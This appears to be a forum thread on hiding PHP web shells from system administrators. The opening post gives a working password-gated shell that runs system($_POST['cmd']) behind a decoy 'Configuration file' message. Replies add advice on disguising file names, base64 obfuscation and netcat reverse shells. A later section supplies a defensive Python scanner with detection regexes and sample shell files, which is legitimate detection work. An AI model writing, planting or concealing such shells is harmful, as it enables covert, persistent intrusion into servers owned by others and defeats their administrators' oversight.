Hiding web-shells from the casual browser.
  • peann
    Posts: 14
    The last thing an attacker wants after all of his hard work of injecting a shell, is for the sys-admin to find it and remove it. This is my usual practice for hiding web-shells.

    Name

    The name shouldn't be something that immediately stands out to an admin casually browsing the files in the directory. Usually config.php, info.php, or install.php suffice.

    Hidden password protection

    On any shell I script, I like to have it request a variable via the $_GET method, and if the value is empty or does not contain the correct password, then I usually either do not print the shell contents and instead print a fake page, or else redirect the user to the webroot.

    Take the following simple shell for example. (Apologies for any code errors, doing this off the top of my head)


    <?php
    session_start();
    if (!isset($_SESSION['auth'])) {
        if (!isset($_GET['login'])) {
            // No login parameter: print the decoy text only.
            echo "Configuration file. Please do not delete this.";
        } else if ($_GET['login'] != "s3cr3tp455w0rd") {
            // Wrong password: print the same decoy text.
            echo "Configuration file. Please do not delete this.";
        } else {
            $_SESSION['auth'] = 1;
            echo "Logged in.";
            echo "<form action=" . $_SERVER['PHP_SELF'] . " method=post>";
            echo "Command: <input type=text name=cmd><br />";
            echo "<input type=submit value=Execute><br />";
            echo "</form>";
            echo "<hr><pre>";
            system($_POST['cmd']);
            echo "</pre><hr>";
        }
    }
    ?>


    Anyone who browses the file will simply see an error telling them not to delete the file. Usually in pre-configured CMSs, most web developers won't actually delete the file because they will assume that it's legit. The only way the shell will display is if the user passes a value to a variable called 'login', with the password 's3cr3tp455w0rd'. Obviously, you can change these to whatever you desire (and I implore you to do so!).

    This is also great for protecting against any other hackers who may come across your shell. You can try to obfuscate the shell's code if you like, to further protect it against other hackers.

    Maintaining control of a system is almost as hard as, if not harder than, gaining control! Hope this helps in future.

    peann.
  • nu11byte
    Posts: 53
    Mhm, very true. I usually name mine:
    Apache config.php
    contactus.php
    etc. Just something along those lines.
  • Xin
    Posts: 3,251
    I usually name mine lib_mail.php or something that looks similar to the other php files in the directory. Nice idea though, I didn't think of putting a fake page. However, it still won't protect against finding it server side, which is what many sysadmins do, such as searching and grepping for things like c99, r00t, 2.6.*, backconnect, shell, etc. and other common phrases that occur in shells.
    Xin
  • peann
    Posts: 14
    Xin said:

        I usually name mine lib_mail.php or something that looks similar to the other php files in the directory. Nice idea though, I didn't think of putting a fake page. However, it still won't protect against finding it server side, which is what many sysadmins do, such as searching and grepping for things like c99, r00t, 2.6.*, backconnect, shell, etc. and other common phrases that occur in shells.

    You can obfuscate the code. I generally write my own shells, and then either use netcat to spawn a shell back to my account, or create a perl script to do so if netcat is not installed. A lot of those web-shells are bloated. The one above I posted works just fine.
  • The password protection is good against fellow hackers, as is changing the default title if you're using a premade shell from someone else, so someone can't just d0rk you. But if you're keeping it from the sysadmin, then base64 or something similar will typically work.
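Xin's point, and the last reply about base64, are really a statement of what a server-side scan has to look for: the file name and the decoy text prove nothing, and a grep for "shell" or "c99" is beaten by the moment someone wraps the payload in eval(base64_decode(...)). The following is an added example written for this page, not code from the thread or from any of its posters. It scans PHP sources for the shapes that actually matter: an execution sink fed straight from $_GET/$_POST/$_REQUEST/$_COOKIE, eval() or assert() on request data, eval() around a decoder, and unusually long base64 runs. The rule set, the 200-character threshold and the four sample files (one of which mirrors the shell posted above) are assumptions constructed for the demonstration.

```python
import base64
import re
from pathlib import Path

# Request superglobals that carry attacker-controlled input.
REQUEST_INPUT = r"\$_(?:GET|POST|REQUEST|COOKIE)\b"

# Each rule is one thing a reviewer would grep for. Dict order is also the
# order in which hits are reported for a file.
RULES = {
    # A command-execution sink called directly on request data: the shape of
    # the shell posted in the thread, system($_POST['cmd']).
    "exec-sink-from-request": re.compile(
        r"\b(?:system|exec|shell_exec|passthru|popen|proc_open)\s*\(\s*" + REQUEST_INPUT,
        re.I,
    ),
    # eval()/assert() fed straight from the request.
    "eval-from-request": re.compile(r"\b(?:eval|assert)\s*\(\s*" + REQUEST_INPUT, re.I),
    # eval() wrapped around a decoder: what "base64 or something similar"
    # looks like on disk, and what a grep for 'system' or 'shell' misses.
    "eval-of-decoded-blob": re.compile(
        r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\(",
        re.I,
    ),
    # A long run of base64 alphabet characters. The 200-char threshold is an
    # assumption chosen to skip short tokens, hashes and keys.
    "large-encoded-literal": re.compile(r"[A-Za-z0-9+/]{200,}={0,2}"),
}


def scan_source(source: str) -> list[str]:
    """Return the ids of every rule that fires on one file's source text."""
    return [rule_id for rule_id, rx in RULES.items() if rx.search(source)]


def scan_files(files: dict[str, str]) -> dict[str, list[str]]:
    """Scan an in-memory {path: source} map (handy for tests, or for content
    pulled out of a backup or a git diff rather than the live webroot)."""
    return {path: scan_source(src) for path, src in files.items()}


def scan_directory(root: str) -> dict[str, list[str]]:
    """Scan every *.php file under root and return only the files with hits."""
    found: dict[str, list[str]] = {}
    for path in Path(root).rglob("*.php"):
        try:
            hits = scan_source(path.read_text(errors="replace"))
        except OSError:
            continue  # unreadable file: skip rather than abort the whole scan
        if hits:
            found[str(path)] = hits
    return found


def flagged(files: dict[str, str]) -> list[str]:
    """Sorted names of the files that tripped at least one rule."""
    return sorted(path for path, hits in scan_files(files).items() if hits)


# Constructed sample files; none of these come from a real server.
_BLOB = base64.b64encode(b"system($_POST['cmd']);" * 8).decode()
SAMPLES = {
    # Mirrors the thread's shell: decoy name, decoy text, sink on $_POST.
    "config.php": (
        '<?php if (($_GET["login"] ?? "") !== "example") { echo "Configuration file."; }\n'
        'else { system($_POST["cmd"]); } ?>'
    ),
    # A real configuration file: same kind of name, no sinks, must not fire.
    "settings.php": '<?php $db_host = "localhost"; define("DEBUG", false); ?>',
    # Obfuscated variant: nothing greppable as "system" or "shell" appears.
    "lib_mail.php": f'<?php eval(base64_decode("{_BLOB}")); ?>',
    # Legitimate exec() on a program-built, escaped argument; must not fire.
    "image_util.php": (
        '<?php function thumb($f) { return exec("convert " . escapeshellarg($f)); } ?>'
    ),
}

if __name__ == "__main__":
    for path, hits in scan_files(SAMPLES).items():
        print(f"{path:16} {', '.join(hits) or '-'}")
```

Run against the samples it flags config.php and lib_mail.php and leaves settings.php and image_util.php alone; point scan_directory() at a webroot to do the same on disk. The regexes are deliberately about the call shape rather than signature strings, which is why the encoded variant is still caught, and why a benign exec() on an escaped, program-built argument is not.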